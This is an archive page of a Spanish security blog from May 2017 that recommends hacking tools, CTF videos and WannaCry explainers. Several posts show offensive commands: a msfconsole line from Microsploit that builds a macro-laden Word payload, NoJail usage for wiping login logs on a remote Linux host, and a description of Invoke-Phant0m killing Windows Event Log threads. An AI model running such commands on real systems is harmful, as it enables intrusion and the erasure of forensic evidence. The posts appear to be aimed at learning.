Este blog ya no está activo, sigue informándote aquí:

miércoles, 31 de mayo de 2017

Vídeo.- Google: Cómo evitar ataques de ingeniería social

Ya sabéis. que al final por mucho que aseguremos nuestras máquinas el mejor antivirus somos nosotros mismo. Por eso debemos estar formado y atentos a cualquier tontería que veamos o detectemos como sospechosa.

Google lo sabe y por eso ha publicado algunas claves para concienciarnos de las amenazas y ver como tenemos que reaccionar para solucionarlas.


Sed Buenos ;) 

martes, 30 de mayo de 2017

Proyecto.- Pray for tonto

Para los nuevos que leéis este blog Tonto es un asistente virtual que empecé a programar para aprender Python y que poco a poco ha ido tomando forma. Pero ya hace meses que no he escrito ni una linea de su código justo cuando cree el foro Pray for Tonto para que la gente que me enviaba recomendaciones y pedía consejo se pudieran responder los unos a los otros y de esta manera jugar con la tecnología, que es lo que nos gusta al fin y al cabo. 

Pero al ver que casi nadie aportaba, al final, me olvide de ella hasta que recibí en mi inbox, el siguiente mensaje: 


Además de tocarme muy fuerte la "patata", habían varias ideas chulas en los hilos, así que creo que la poca colaboración que ha habido se debe a que no he movido el tema ya que la gente quiere colaborar. 


De esta manera ahora tendremos el siguiente muñeco a la derecha del blog por si queréis colaborar y yo me comprometo a aportar mas valía a este foro. 

Enlaces para que los que no sepáis que es Tonto:

 Sed Buenos ;) 

lunes, 29 de mayo de 2017

PRET.- No mires la basura mira a tu impresora.

Por si no lo sabéis en muchas empresas la basura se trata de una manera diferente a lo que estamos acostumbrados nosotros en casa. Esto es debido a que se trata con información sensible o de importancia y no queremos que un tipo, rebuscando en la basura, obtenga dicha información.  A esto se le llama dumpester diving, pero lo que ahora está de moda es escarbar en tu impresora. 


PRET es una herramienta que nos permite descubrir las impresoras conectadas a nuestra red y explotarlas para que nos devuelva y además el usage es simple. ¿Qué mas podemos pedir?

  • usage: pret.py [opcion] target {ps,pjl,pcl}

Mucha mas información y link al repositorio de la herramienta: 
Sed Buenos ;) 

domingo, 28 de mayo de 2017

Vídeo.- Una invitación para HackTheBox

Hoy es domingo y toca vídeo. Pero quiero pararme un poco a explicaros que es HackTheBox y por que mola el capítulo de hoy.

HackTheBox es una pagina dedicada a probar técnicas relacionadas con pentesting e intercambiar ideas con la gente de su comunidad. Pero lo que mas me gusta es que has de hackear la página para encontrar la Key de invitación que te permita registrarte en ella. 

Os pego el enlace aquí abajo y si realmente queréis intentarlo no os miréis el vídeo hasta que no os sea necesario: 
Hace mucho nos dijeron que esto de ver el código fuente de una página no servia para nada. No dejan de tener parte de razón pero no deja de ser una de las principales técnicas que tiene un Hacker para trastear con páginas web.

En este caso Kazukun nos muestra como loguearnos en la pagina de "retos" Hack The Box la cual has de hackear para poder obtener una invitación.

Esperamos que os guste:



Sed Buenos ;)  

viernes, 26 de mayo de 2017

Vídeo.- Raspberry + TOR

Creo que este "artefacto" es uno de los primeros que debería tener alguien que le mole cacharrera con la seguridad informática. Es fácil de montar si no se te va mucho la cabeza probando cosas, es útil y aprendes un montón sobre configuraciones de linux y de tor. 

Además en este vídeo lo explican genial y hay un tío vestido de cura, que mas podemos pedir. 



Sed Buenos ;) 

jueves, 25 de mayo de 2017

Infografia.- Como funciona Wannacry paso por paso

Como buen curioso de este mundo, saber como actuaba el Ransomware de moda en las últimas semanas ha sido mi perdición así que si tenis la misma curiosidad que yo os va encantar esta infografia donde se muestra paso por paso como funciona este malware. Con pelos, señales y hasta el boletín que tendríais que tener instalado. 


Sed Buenos ;)

miércoles, 24 de mayo de 2017

Microsploit.- Trasteando con Office y Metasploit.

La verdad es que no se muy bien como calificar a este script pero la verdad es que es una buena herramienta si quieres trastear con documentos Office maliciosos. No se si os pasará a vosotros pero metasploit se me hace un poco pesado a la hora de trabajar con el, sobretodo si no tienes muy claro que exploit en concreto estas buscando por eso Microsploit mola. Gracias al menú podemos seleccionar que tipo de bicho queremos y el script por si solo interectua con metasploit y nos genera  el documento con macros en la carpeta output.


Ejemplo de como actúa el script con metasploit: 

"$msfconsole -x 'use exploit/multi/fileformat/office_word_macro; set payload $payloads ; set FILENAME $fira.docm; set BODY $bodys; set lhost $yourip ; set lport $yourport; set target 1; exploit; exit -y'" 
echo "" 
mv ~/.msf4/local/$fira.docm $path/output/$fira.docm

 Recomendable, pero siempre sabiendo lo que se está haciendo (aquí se ha hablado mucho sobre word con macros) y se necesitarán unas nociones básicas de metasploit.

Enlace al GitHub:



Sed Buenos ;)

martes, 23 de mayo de 2017

Aprendiendo Bluetooth Hacker MODE :ON

Ayer en el metro, mientras escuchaba música, me puse a mirar a toda la gente que estaba embobada mirando su smartphone y pensé en cuantos de ellos tendrían el Bluetooth activado por defecto y en lo que podría hacer si supiera tanto como [Pablo F. Iglesias] pero como aun no, por algun lado tendré que empezar. 


Así que, cual ha sido me sorpresa al encontrarme con el Git Hub de [Brando Asuncion] donde le ha hecho ingeniería inversa al protocolo de la manera mas Hacker que se me ocurre. Brando se ha creado un script que emula ser un radar de dispositivos bluetooth, ha escuchado la salida con Wireshark y después ha recopilado toda la información sobre la petición y la respuesta en su repositorio.

Muy recomendable y bien explicado, ademas tenéis los script que ha usado para reproducir el experimento: 



Sed Buenos ;) 


lunes, 22 de mayo de 2017

MS17-010 Usado para minear Monero

Si os pensabais que a nadie mas se le había ocurrido usar Eternal Blue ibais muy equivocados. Proofpoint analizando WannaCry descubrieron una clase de Malware (llamado Adylkuzz) que usaba EternalBlue y DoublePulsar para instalar de manera masiva un minero de la criptomoneda Monero. Se calcula que ha tenido un alcance parecido al famoso Ransomware pero, como no da un mensaje de alerta pues no ha saltado a la luz pública.


Hoy os recomiendo el post de proofpoint donde explican como lo descubrieron y como lo destriparon. No os voy a explicar mucho mas ya que espero que os lo leáis.  Merece la pena: 

domingo, 21 de mayo de 2017

HackThis Javascript 3.- Devuelveme la pass

Domingo y hoy toca ver la solución al tercer reto de Javascript en HackThis. Javascript mola mil pero siempre y cuando hagamos las cosas bien. así que no dejemos las pass harcodeadas en el código ya que es muy fácil llamar con un alert() a la variable en la que está metida la pass. De esta manera Kazukun nos muestra como solucionar el tercer reto de Javascript en HackThis.

Sed Buenos ;)

viernes, 19 de mayo de 2017

Vídeo - La Brecha Digital - Cifra tu mundo

Viernes y hoy toca vídeo para desgrasar de tanta actualizad y de tanto Wannacry pero que nos permita estar alerta y de como reaccionar para blindarnos en la red de red. 
Tor, VPN, VoIP segura, Seguridad WiFi, Cifrado de Archivos para almacenar en la nube, uso de una raspberry pi para limpiar el unidades USB sospechosas, sistema operativo seguro Qubes OS y más.

Espero que os guste y que os sirva como a mi para interesaros un poco mas en este mundo.



Sed Buenos ;) 

jueves, 18 de mayo de 2017

Infografia.- El Balance de WannaCry

Bueno, después de casi una semana con la resaca del WannaCry me he preguntado cuanta gente a pagado o cuanto es el daño que ha causado. Así que ha sido una sorpresa que el ABC haya sacado una infografia donde hacen el recuento por nosotros.  No se bien bien de donde han sacado todos los datos pero en términos generales me sirve para hacerme una idea y creo que a vosotros también. 


Sed Buenos ;)

miércoles, 17 de mayo de 2017

Podcast.- Podcast Dame una Shell - 2

Dame una Shell, el podcast de nuestro amigo Snifer, se está convirtiendo en uno de mis podcast de referencia y no es para menos. Me encanta todo lo que salga de la cominudad y en esta edición de podcast Snifer la ha clavado. No solo le ha dado un buen repaso al Keylogger preinstalado de HP que ha sido totalmente tapado por el tema de WanaCry si no que también ha tratado el tema del Kill Switch (Ya sabies, el episodio del joven que localizo la dirección de descarga de WanaCry y la compro para par la primera versión) que a mi me tenia tan extrañado. 

Le ha salido un podcast redondo y me da envidia no poder participar. Envidia te tengo Dino! 


Muchas mas información, enlaces y fuente:



Sed Buenos ;) 

martes, 16 de mayo de 2017

Vídeo.- Python. Más rápido que C

No, aun no me queméis por hereje, se que el titulo puede llegar un poco a engaño y digo un poco por que Facundo Batista a trasteado un monto para compararlo con C hasta el punto de descubrir que optimizándolo de la forma correcta Python no es mucho mas lento que C y ganamos velocidad en escribirlo. 

Super-entretenido y curioso. Se tenéis curiosidad por ver como funcionan los lenguajes de programación por debajo os recomiendo que lo veáis. 


Sed Buenos ;) 

lunes, 15 de mayo de 2017

Stop using SMBv1

Por fin es Lunes y el estrés por el tema de Wanacry ha disminuido (al menos a mi alrededor) aunque lo estén repitiendo todo el día en las noticias. Yo por mi parte, ya que lo estaba viviendo, e intentado ver lo menos posible la información que desprendían los medios y centrarme en la comunidad, donde he podido encontrar aportaciones tan chulas como: [El GitHub de Wannacrypt0r-FACTSHEET] donde posiblemente esta toda la info que necesitas saber sobre este malware, [la entrada de hoy de fwhibbit] sobre este Malware como referencia a todos los que han escrito sobre este tema o [la entrada del Maligno  que el día después del ataque] se atrevió a explicar lo que paso con Telefónica y ademas como funcionaba el malware, es para darle un besico en el gorro.

Así que a mi solo me queda deciros lo siguiente, dejad de usar SMBv1, parchead y/o aplicad el siguiente Workaround en vuestras PowerShells:

  • set-smbserverconfiguration -EnableSMB1Protocol $false
Ah, y mostraros la siguientes viñetas que me han hecho mucha gracia: 


Sed Buenos 

domingo, 14 de mayo de 2017

HackThis Javascript 2.- Saber mates a veces va bien!

Después de un fin de semana raro entre el Ransomware y los cinco puntos en eurovisión cuando nos merecíamos los cero puntos, volvemos con los vídeos del Domingo.

Javascript es un lenguaje de programación que nos deja hacer un montón de cosas y entre ellas está la posibilidad de ayudarnos a realizar operaciones matemáticas. Pero que pasa si nos encontramos con un reto que usa Javascript para calcular que la pass es correcta.

Hoy, Kazukun, nos muestra como pasarnos el reto numero dos de Javascript jugando con las formulas. Esperamos que os guste.


Sed Buenos ;)

viernes, 12 de mayo de 2017

The Keylogger .- Conexant HD Audio Driver Package

Después de todo el el revuelo del [Ransomware de Telefónica] que ha llenado las redes sociales de revuelo y gozo, ha tapado uno de los problemas por parte de HP mas flagrantes de los últimos años. 


Resulta que han encontrado un "keylogger" llamado MicTray64.exe que se instala junto a los drivers Conexant HD Audio Driver y monitoriza las pulsaciones de tu teclado y las guarda en C:\Users\Public\MicTray.log.  Vamos, es genial y justo lo que quieres cuando te compras un portátil. Indignado me hallo.

Ordenadores afectados:
  • HP EliteBook 820 G3 Notebook PC 
  • HP EliteBook 828 G3 Notebook PC 
  • HP EliteBook 840 G3 Notebook PC 
  • HP EliteBook 848 G3 Notebook PC 
  • HP EliteBook 850 G3 Notebook PC 
  • HP ProBook 640 G2 Notebook PC 
  • HP ProBook 650 G2 Notebook PC 
  • HP ProBook 645 G2 Notebook PC 
  • HP ProBook 655 G2 Notebook PC 
  • HP ProBook 450 G3 Notebook PC 
  • HP ProBook 430 G3 Notebook PC 
  • HP ProBook 440 G3 Notebook PC 
  • HP ProBook 446 G3 Notebook PC 
  • HP ProBook 470 G3 Notebook PC 
  • HP ProBook 455 G3 Notebook PC 
  • HP EliteBook 725 G3 Notebook PC 
  • HP EliteBook 745 G3 Notebook PC 
  • HP EliteBook 755 G3 Notebook PC 
  • HP EliteBook 1030 G1 Notebook PC 
  • HP ZBook 15u G3 Mobile Workstation 
  • HP Elite x2 1012 G1 Tablet 
  • HP Elite x2 1012 G1 with Travel Keyboard 
  • HP Elite x2 1012 G1 Advanced Keyboard 
  • HP EliteBook Folio 1040 G3 Notebook PC 
  • HP ZBook 17 G3 Mobile Workstation 
  • HP ZBook 15 G3 Mobile Workstation 
  • HP ZBook Studio G3 Mobile Workstation 
  • HP EliteBook Folio G1 Notebook PC
Solución:
  • Borra los ejecutables MicTray y los archivos de log relacionados a este. 
Mucha mas información y fuente:

Sed Buenos ;)

jueves, 11 de mayo de 2017

INCIBE.- Glosario de términos de ciberseguridad

Muchas veces no nos damos cuenta pero si alguien nos cogiera por la calle hablando de nuestras cosas de "Hackers" seguro que no entendería la mitad de las palabras que decimos pues, lo mismo le pasa a tu Director y muchas veces has de ponerte en su piel y explicarle las cosas como se deben. 


INCIBE ya se ha adelantado a esto y ha preparado un glosario de términos para te puede ser muy útil si eres nuevo en este mundo o te quieres enterar de lo que hablan tus empleados.  

Link al Glosario de INCIBE: 

Bueno, aunque si emplean un lenguaje mas técnico, ni con el glosario te vas a salvar.

Sed Buenos ;)

miércoles, 10 de mayo de 2017

NoJail.- Borrando voy, borrando vengo.

Hoy me he encontrado de morros con el repositorio freedom fighting de Ivan Kwiatkowski  y no me he podido evitar curiosear en su interior. Este repositorio tiene tres scripts en Python destinados a ayudarte a borrar el posible rastro que puedas dejar pero el que mas me ha llamado la atención es NoJail. 


NoJail está destinado a buscar los posibles logs que puedan haber en determinadas rutas de un Linux remoto, borrarlos y verificar que han sido borrados. 

Rutas Linux a las que accede para borrar logs: 
  • /var/run/utmp
  • /var/log/wtmp
  • /var/log/btmp 
  • /var/log/lastlog
  • /var/**/*.log 
  • Cualquier otra ruta que le piquemos manualmente. 

También como podréis ver a continuación, tiene un uso muy simple:
  • ./nojail.py --user root --ip IP /etc/app/logs/access.log --check
Enlace al repositorio donde encontrareis muchas mas información:
Además casi no tiene dependencias y en Python eso siempre es un Win. 

Sed Buenos ;) 

Scanless.- Varios escaners Web en un comando.

Si nunca lo habéis buscado, existes muchas aplicaciones web que nos permiten hacer un escaneo de puertos a otra máquina con solo introducir la IP o el dominio de una máquina. Así que, sabiendo que con Python podemos hacer consultas a páginas web y parsear el resultado, Austin Jackson ha cogido esta idea y se ha montado una herramienta muy fácil de usar que nos permite escanear por cinco escaners de puertos distintos con solo un comando. Fácil, cómodo y si queremos podemos usar los 5 a la vez para una sola máquina. 



Escaners que utiliza:
  • yougetsignal
  • viewdns
  • hackertarget
  • ipfingerprints
  • pingeu
Usage:
  • scanless.py [-h] [-t TARGET] [-s SCANNER] [-l] [-a]
Más información y enlace a la herramienta:

Sed Buenos ;) 

lunes, 8 de mayo de 2017

Wiki.- Ultimate Android Reference

Si hace unos días hablábamos de la [wiki asombrosa sobre Hacking] donde podríamos encontrar recursos, herramientas o papers referentes para diferentes técnicas de Hacking, hoy quiero recomendaros la  Ultimate Android Reference donde encontraremos un montón den información sobre Android. 


Como no, también está en GitHub pero me ha ha venido muy bien para calmar mi curiosidad sobre la persistencia de archivos en Android. Igual que con la anterior wiki aquí podremos encontrar de todo y parece que se actualiza constantemente así que, muy recomendable. 


Enlace al Git Hub:


Sed Buenos ;) 

domingo, 7 de mayo de 2017

HackThis Javascript 1.- Where is my code!

Bueno, hoy es domingo y ya sabéis lo que toca, después de pasar por "todos" los retos intermediate (Si todos por que el 5 no está disponible a día de hoy) Kazukun se mete de lleno con el primer reto de la serie Javascript, el cual tendrá que buscar el código que contiene la palabra para pasar al siguiente reto.

Esperamos que os guste:


Sed Buenos ;) 

viernes, 5 de mayo de 2017

Vídeo.- MalwareAnalysisForHedgehogs

Hoy no quiero recomendaros un vídeo solo, si no un canal de youtube como tal, [MalwareAnalysisForHedgehogs] suben cada semana un vídeo donde trastean con algún Malware y hacen su análisis o cada cuando les da hace un podcast hablando de lo que a ellos les interesa y dando información de por donde empezar a los novatos como yo. Muy recomendable. 

Aquí tenéis un ejemplo:


Sed Buenos ;) 

jueves, 4 de mayo de 2017

Infografía.- Como ser contratado como Pentester

Hace unos días tuvimos por aquí la genial noticia de que Kazukun fue llamado para una entrevista para trabajar en este mundo que nos encanta a todos y creo que esta infografía no solo le va ir bien a el si no que a todos los estudiantes de informática que os mola todo esto también. 

No solo os quedéis con la infografía hoy os recomiendo para entender cada uno de los puntos: 


Muchas mas información sobre cada uno de los puntos de la infografía y fuente: 


Sed Buenos ;) 

miércoles, 3 de mayo de 2017

PowerShell.- Invoke-Phant0m

Una herramienta mas para PowerShell que, si alguna vez soñamos en dejar una máquina sin rastro de que hemos estado allí, nos ayudará un montón a eliminar procesos y subprocesos relacionados con nuestra actividad para que no aparezcan en el registro de Windows. 

"Este script, camina en las pilas del subproceso Event Log Service (específicamente svchost.exe) e identifica los hilos del registro de sucesos para eliminar los subprocesos del Event Log Service, por lo tanto, el sistema no podrá recopilar registros y al mismo tiempo, el Event Log Service aparecerá en ejecución."
 Vídeo de como funciona este script:


 


Enlace a la herramienta:
 
Sed Buenos ;)

martes, 2 de mayo de 2017

Paper.- El mal uso de puertos en varias App.

Siempre se ha dicho que los smartphones son ordenadores de bolsillo. Así que, ¿nunca os habéis parado de pensar qué puertos abiertos tendrán estos dispositivos? pues Yunhan Jack Jia, Qi Alfred Chen, Yikai Lin, Chao Kong, Z. Morley Mao de la Universidad de Michigan, Si y descubrieron algo muy chulo. ¿Alguna vez habéis hecho un Nmap a un smartphone? Pues si lo hacéis descubriréis lo chulos que pueden ser estos dispositivos a ese nivel, pero la buena gente de la Universidad de Michigan han descubierto que muchas aplicaciones pueden dejar puertos abiertos. Por lo que ya os podéis pensar el estropicio que se puede hacer.

Enlace al paper: 

Vídeo muestra del "estropicio":


Sed Buenos ;) 

lunes, 1 de mayo de 2017

Wiki.- Awesome Hacking

Si hace un par de días hablábamos de [Awesome CVE] un repositorio de vulnerabilidades con sus respectivas PoC (Pruebas de concepto) hoy quiero recomendaros el repositorio Awesome Hacking una especie de Wiki en GitHub, donde hay un montón de información sobre hacking y sobre cualquier tecnología que queráis trastear. 


Muy completo, hay un arsenal para hacer pruebas de la seguridad de vuestra wifi, información para que "experimentéis"con vuestro auto y/o si no os apetece, siempre podéis animaros a solucionar una de las CTFs que hay en este repositorio. 

Enlace al GitHub:


Sed Buenos ;)